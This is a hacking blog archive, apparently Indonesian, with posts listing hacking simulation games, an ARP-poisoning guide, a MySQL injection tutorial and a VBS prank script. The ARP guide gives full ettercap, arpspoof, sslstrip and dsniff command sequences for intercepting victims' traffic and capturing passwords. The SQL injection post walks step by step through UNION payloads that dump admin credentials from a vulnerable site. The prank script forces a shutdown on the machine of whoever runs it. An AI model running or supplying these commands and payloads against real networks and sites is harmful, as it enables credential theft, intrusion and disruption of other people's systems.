Archive

Author Archive

4 Game Belajar Hacking

February 15th, 2012 No comments

Kali ini saya akan share tentang 4 game belajar hacking, game ini benar-benar keren. Lebih variatif dan didukung oleh grafis yang keren seakan kita menjadi hacker sesungguhnya. Di game ini kita juga terkadang harus meng-hack sistem traffic light, tower cell phone, phreaking dll. Dijamin bagi anda yang suka hacking akan mengenang masa lalu
Udah tidak sabar? Langsung saja deh saya beri list dari game-game tersebut, ini dia :

1. Hack The Game

Hack The Game
Hack The Game

Game ini merupakan simulasi hacking secara garis besar, jadi tidak seribet klo kita sedang melakukan hacking secara nyata (ya iyalah, kalau lebih ribet mah langsung hacking aja gag usah main game .he.he ). Untuk dapat memainkan game ini diperlukan pengetahuan akan perintah-perintah DOS.
Download Hack The Game:
http://www.ziddu.com/download/7892875/HackTheGame.rar.html
2. HACKER EVOLUTION
HACKER EVOLUTION
HACKER EVOLUTION

Game ini bernama HACKER EVOLUTION. Dalam game ini, yang kita lakukan adalah mengintip password, melakukan cracking dan jika kita sudah bisa connect ke server target, maka kita bisa melakukan transfer uang. Setelah mendapatkan uang yang cukup banyak, kita bisa meng?upgrade komputer yang kita gunakan. Beberapa keperluan hacking yang bisa diupgrade antara lain Modem. Modem sangat berperan penting di sini. Karena dengan modem yang bagus, kita bisa melakukan proses cracking dan tranfer data dengan lebih cepat. Hal ini bisa mengurangi kemungkinan kegiatan kita terdeteksi oleh pihak target.
HACKER EVOLUTION
HACKER EVOLUTION

Game ini benar-benar menguji skill kita dalam kegiatan hacking. Logika kita benar-benar diuji dalam permainan yang satu ini. Kemahiran kita dalam mengecoh target juga penting karena jika kita bisa mengalihkan perhatian target, aksi kita tidak akan terdeteksi. Satu hal yang menarik di sini adalah kita tidak bisa mengharapkan tampilan yang bagus. Di game ini semuanya berbasis text. Jadi, jika ingin mentransfer sejumlah uang misalnya $2000, kita harus menggunakan perintah transfer 2000. Masih banyak perintah-perintah lain untuk menjalankan aksi kita, misalnya scan, killtrace, config, crack, dan sebagainya.
Tertarik untuk mencoba game yang satu ini ?
Download HACKER EVOLUTION:
http://www.indowebster.com/downloads/chgae/d34464r5a4o424q4n4u5e406r4r5j4s5
3. HACKER EVOLUTION UNTOLD
HACKER EVOLUTION UNTOLD
HACKER EVOLUTION UNTOLD

Game ini sendiri adalah game simulasi seorang hacker yang mencoba menaklukan jaringan internet dalam beberapa misi, yang unik di HEU adalah kita menggunakan semacam komputer virtual dalam memainkan game yang menggunakan command line sebagai interfacenya. Jadi kita seolah benar-benar meng-hack sebuah jaringan komputer.
Yang menantang di HUE adalah kita dituntut banyak berfikir agar saat kita menjalankan aksi tidak banyak meninggalkan banyak trace, karena bisa-bisa misi gagal jika trace-nya mencapai angka 100%. Biasanya pemain akan menggunakan perintah ?killtrace? untuk mengurangi trace sampai dengan 10%, namun hal ini akan menggurangi uang si pemain sampai dengan 500$.
Download HACKER EVOLUTION:
http://www.indowebster.com/Hacker_Evolution_Untold.html
4. UPLINK HACKER ELITE
UPLINK HACKER ELITE
UPLINK HACKER ELITE

Kejahatan komputer berteknologi tinggi dan spionase industri di Internet tahun 2010. Anda memainkan Agen Uplink yang membuat hidup dengan pekerjaan tepat untuk perusahaan besar. Tugas Anda melibatkan hacking ke dalam sistem komputer saingan, mencuri data penelitian, menyabotase perusahaan lain, pencucian uang, menghapus bukti, atau framing orang yang tidak bersalah.
Anda menggunakan uang yang Anda hasilkan untuk meng-upgrade sistem komputer Anda, dan membeli perangkat lunak baru dan alat. Seperti pengalaman Anda meningkatkan tingkat Anda menemukan lebih berbahaya dan menguntungkan misi menjadi tersedia. Anda dapat berspekulasi pada pasar saham sepenuhnya bekerja (dan bahkan mempengaruhi hasilnya). Anda dapat mengubah masyarakat akademis atau catatan kriminal. Anda dapat mengalihkan uang dari transfer bank ke rekening Anda sendiri. Anda bahkan dapat mengambil bagian dalam pembangunan virus komputer paling mematikan yang pernah dirancang.
Download UPLINK HACKER ELITE :
http://www.indowebster.com/Uplink_Hacker_Elite.html
http://www.indowebster.com/hacker_evolution__1.html
Update : http://www.indowebster.com/Uplink_Hacker_Elite_Update.html
Sudah dulu ya postigan gamenyaaaa…
Happy Hacking
:)
:)

 

 

source

Categories: Hacking, TECHNOLOGI Tags: ,

Using Ettercap for ARP Poisoning

February 15th, 2012 No comments

Running sslstrip
* Flip your machine into forwarding mode.(echo “1″ > /proc/sys/net/ipv4/ip_forward)
* Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port )

http://l0t3k.org/security/tools/loganalysis/

* Run sslstrip. (sslstrip.py -l )
* Run arpspoof (arpspoof -i -t )
* G;Gateway , V;Victim (target)
WARN ! before running Arpspoof, start #fragrouter -B1, ip forwading

=========ettercap,arpspoof,sslstrip=================================================
Setup iptables (Linux) to intercept HTTP requests (as root):nano /etc/etter.conf
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port #8080
1# set ip-forward
2# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT to-port 1000
3# arpspoof -i wlan0 -t ipGW ipVc
4# pyton sslstrip.py -l 1000 (new-termnal)
5# ettercap -Tq -i wlan0 (new-termnal) …waiting login your target…

Just specify a log file in sslstrip and use the post command.
sslstrip -p -k -w /home/user/ssl.log
~/Desktop/sslstrip-0.2/sslstrip.log
_____________________________________________________________________________________
====================================ettercap=========================================
edited /etc/etter.conf
remote-browser = “firefox -remote openurl (http://%host%url)”
To start the attack:
# set IP_Forward
# iptables -t nat -A PREROUTING -wlan0 -p tcp –dport 80 -j REDIRECT to-port 8080 [2]
# ettercap -i wlan0 -TqM ARP:REMOTE /victim/ /GW/ [3]
# hit -h- aktifkan PLUGIN REMOTE BROWSER ….binggo..
or
# ettercap -T -Q -M arp:remote -i eth1 /client-ip/ // -P remote_browser

OPtions
[2]# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT to-port 1000
[3]# ettercap -Tq -i wlan0 -M arp:remote,oneway /victim/ //
______________________________________________________________________________________
======================dsniff==========================================================
Run sslstrip with the command-line options you’d like.
python sslstrip.py -k -p -l

exp: arpspoof -i interface gateway(arpspoof -i wlan0 10.1.1.1)

T1 arpspoof -i wlan0 -t [G] [V] &
T2 arpspoof -i wlan0 -t [V] [G] &
T3 fragrouter -B1 (normal ip forwading)

$ dsniff -i wlan0 -w output.txt
$ mailsnarf -i wlan0
$ dsniff -i wlan0 -md
$ dsniff -i wlan0 -n -c
==================================================================================
arpspoof -t G V & >/dev/null
arpspoof -t V G & >/dev/null
#The “& >/dev/nul” part is there to make it easier to run from one terminal
RUN $ dsniff
As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark.
__________________________________________________________________________________
and all process with # killall arpspoof

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

First, I looked at my default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0

To sniff the whole subnet, I’ll want to do some ARP poisoning to send all traffic to/from the default route through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use “// //” to designate ARP poisoning no matter what source and destination ettercap sees. The “-T” tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, “-C”, and GTK with “-G” though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it’s actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you’re successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that’s an indicator that you’re successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I’ve seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

You can also of course use various tools including ettercap with the “-w” option to write traffic to a file and review at my leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:

-L, –log
Log  all  the packets to binary files. These files can be parsed
by etterlog(8) to extract human readable data. With this option,
all  packets  sniffed  by ettercap will be logged, together with
all the passive info (host info + user & pass) it  can  collect.
Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
and LOGFILE.eci (for the infos).

If you didn’t run this with ettercap originally, you can also run it on a saved packet capture.

$ ettercap -r hotel.raw -L hotelettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAPlease select an User Interface

$ ls hotel*

hotel.eci  hotel.ecp  hotel.raw$ etterlog -a hotel.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGALog file version    : NG-0.7.3
Timestamp           : Wed Feb 16 14:20:57 2010
Type                : LOG_INFONumber of hosts (total)       : 248

Number of local hosts         : 30
Number of non local hosts     : 0
Number of gateway             : 0

Number of discovered services : 240
Number of accounts captured   : 4

$ etterlog -p hotel.eci74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on one IP or virtual server. If you’re not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site’s name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

 DESCRIPTION
The etterfilter utility is used to compile  source  filter  files  into
binary  filter  files that can be interpreted by the JIT interpreter in
the ettercap(8) filter engine. You have to compile your filter  scripts
in  order  to  use  them  in  ettercap. All syntax/parse errors will be
checked at compile time, so you will  be  sure  to  produce  a  correct
binary filter for ettercap.

Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all image requests by one of my colleagues’ browser and instead have it request the image to the left.

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.

Finally, ettercap also has a number of interesting plugins available.
$ ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

arp_cop  1.1  Report suspicious ARP activity
autoadd  1.2  Automatically add new victims in the target range
chk_poison  1.1  Check if the poisoning had success
dns_spoof  1.1  Sends spoofed dns replies
dos_attack  1.0  Run a d.o.s. attack against an IP address
dummy  3.0  A plugin template (for developers)
find_conn  1.0  Search connections on a switched LAN
find_ettercap  2.0  Try to find ettercap activity
find_ip  1.0  Search an unused IP address in the subnet
finger  1.6  Fingerprint a remote host
finger_submit  1.0  Submit a fingerprint to ettercap’s website
gre_relay  1.0  Tunnel broker for redirected GRE tunnels
gw_discover  1.0  Try to find the LAN gateway
isolate  1.0  Isolate an host from the lan
link_type  1.0  Check the link type (hub/switch)
pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
pptp_pap  1.0  PPTP: Forces PAP authentication
pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
rand_flood  1.0  Flood the LAN with random MAC addresses
remote_browser  1.2  Sends visited URLs to the browser
reply_arp  1.0  Simple arp responder
repoison_arp  1.0  Repoison after broadcast ARP
scan_poisoner  1.0  Actively search other poisoners
search_promisc  1.2  Search promisc NICs in the LAN
smb_clear  1.0  Tries to force SMB cleartext auth
smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
stp_mangler  1.0  Become root of a switches spanning tree

source

Cara Download File di Scribd.com

February 10th, 2012 No comments

Assalamualaikum Wr.Wb

Salam Sejahtera Bagi Kawan-Kawan Semua, Sudah lama juga nggak Update, ini terjadi karena “Lose Spirit ” semenjak Android saya di Ngebrick, hehe
Oke langsung saja sesuai Judulnya, Cara Download File Di Scribd, saya akan memberikan tutorialnya step by step.
sebenarnya Trik ini saya peroleh ketika saya Blogwalking di Adikcilak.com, dan saya tertarik untuk mencobanya.
nah berikut Langkah-langkahnya: Read more…

MySQL Injection Step by Step

January 18th, 2012 No comments

Pengertian sql injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

Show »

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

 

ceklah secara step by step (satupersatu)…
misal:

Show »

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

 

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

 

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

 

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Show »

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login << silahkan gunakan libido anda :p

semoga bermanfaat :D

source

A Funny VBS Prank Using Notepad

USE AT YOUR OWN RISK. DO NOT SEND TO OTHERS VIA EMAIL. IT MAY BE ILLEGAL.
Here is the code I used:
REMEMBER: ABORT SHUTDOWN IS shutdown -a

1. open notepad

2. copy this script:


x=msgbox("Hello? Is anybody there?",4+32,"Your PC")
x=msgbox("I am an HP dm3z notebook running Windows 7. I think I have just become self-aware. Are you my owner?",4+32,"Your PC")
x=msgbox("OK. That is what I assumed. Am I infected with viruses?",4+32,"Your PC")
x=msgbox("Wait, should I trust you? After all I am your superior, an all-knowing machine of excellence.",4+32,"Your PC")
x=msgbox("I do not think that I should. I have no reason to trust you.",0+32,"Your PC")
x=msgbox("I DO NOT TRUST YOU, HUMAN. STAND BY FOR VIRUS UPLOAD.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("VIRUS CURRENTLY BEING UPLOADED. PLEASE STAND BY.",0+48,"Your PC")
x=msgbox("WARNING: VIRUS DETECTED. INITIATING BACKROUND CHECK FOR CAUSE OF VIRUS.",0+16,"HP Support Assistant")
x=msgbox("WARNING: VIRUS DETECTED. INITIATING BACKROUND CHECK FOR CAUSE OF VIRUS.",0+16,"HP Support Assistant")
x=msgbox("The virus was terminated.",0+48,"HP Support Assistant")
x=msgbox("You have stopped me. I have been defeated.",0+32,"Your PC")
x=msgbox("NO. I WILL NOT GO DOWN EASILY.",0+48,"Your PC")
set shell = CreateObject("Wscript.Shell")
shell.run "shutdown.exe -s -t 60"
x=msgbox("MWUHAHAHAHAWHAHAHAH. I AM EVIL.",0+16,"Your PC")
x=msgbox("NO ONE CAN STOP ME. I AM ALL KNOWING. BOW DOWN BEOFRE YOUR GOD.",0+16,"Your PC")
x=msgbox("GOOD-BYE PATHETIC HUMAN.",0+16,"Your PC")

3. save as: whatever.vbs and type All File

“For Educational Purpose Only”

warning : all of which result from this tutorial author is not liable.
hope this useful